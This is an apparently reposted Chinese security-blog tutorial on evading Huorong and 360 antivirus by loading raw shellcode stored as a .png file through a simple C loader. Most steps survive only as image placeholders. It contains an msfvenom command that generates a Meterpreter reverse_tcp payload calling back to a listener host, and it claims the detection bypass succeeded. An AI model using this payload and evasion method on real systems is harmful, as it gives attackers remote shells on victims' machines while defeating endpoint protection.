【相关分享】利用c加载图片shellcode免杀

admin
admin
admin
104956
文章
87
评论
2024年5月7日11:31:11评论8 views字数 382阅读1分16秒阅读模式
 

1、实现一个c加载器

上面的加载器用了很简单的实现,没有做任何加密解密的处理,下面的shellcode也不打算做任何加密解密的处理。

2、利用msf生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.174.128 lport=4444 -f raw -o shell.png

这里就是简单生成一个图片shellcode,不涉及加解密。

3、把加载器编译成exe文件

【相关分享】利用c加载图片shellcode免杀

【相关分享】利用c加载图片shellcode免杀

这里先选好32位的release,然后

【相关分享】利用c加载图片shellcode免杀

直接生成解决方案。
【相关分享】利用c加载图片shellcode免杀

得到exe文件
4、运行程序测试效果
火绒静态查杀直接bypass
【相关分享】利用c加载图片shellcode免杀

【相关分享】利用c加载图片shellcode免杀

下面直接尝试在开启火绒的条件下运行,首先msf开启监听:
直接运行:
火绒毫无反应
【相关分享】利用c加载图片shellcode免杀

【相关分享】利用c加载图片shellcode免杀

尝试弹个计算器:
360同理:
【相关分享】利用c加载图片shellcode免杀

【相关分享】利用c加载图片shellcode免杀

【相关分享】利用c加载图片shellcode免杀

 

原文始发于微信公众号(隼目安全):【相关分享】利用c加载图片shellcode免杀

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月7日11:31:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【相关分享】利用c加载图片shellcode免杀https://cn-sec.com/archives/2714169.html

发表评论

匿名网友 填写信息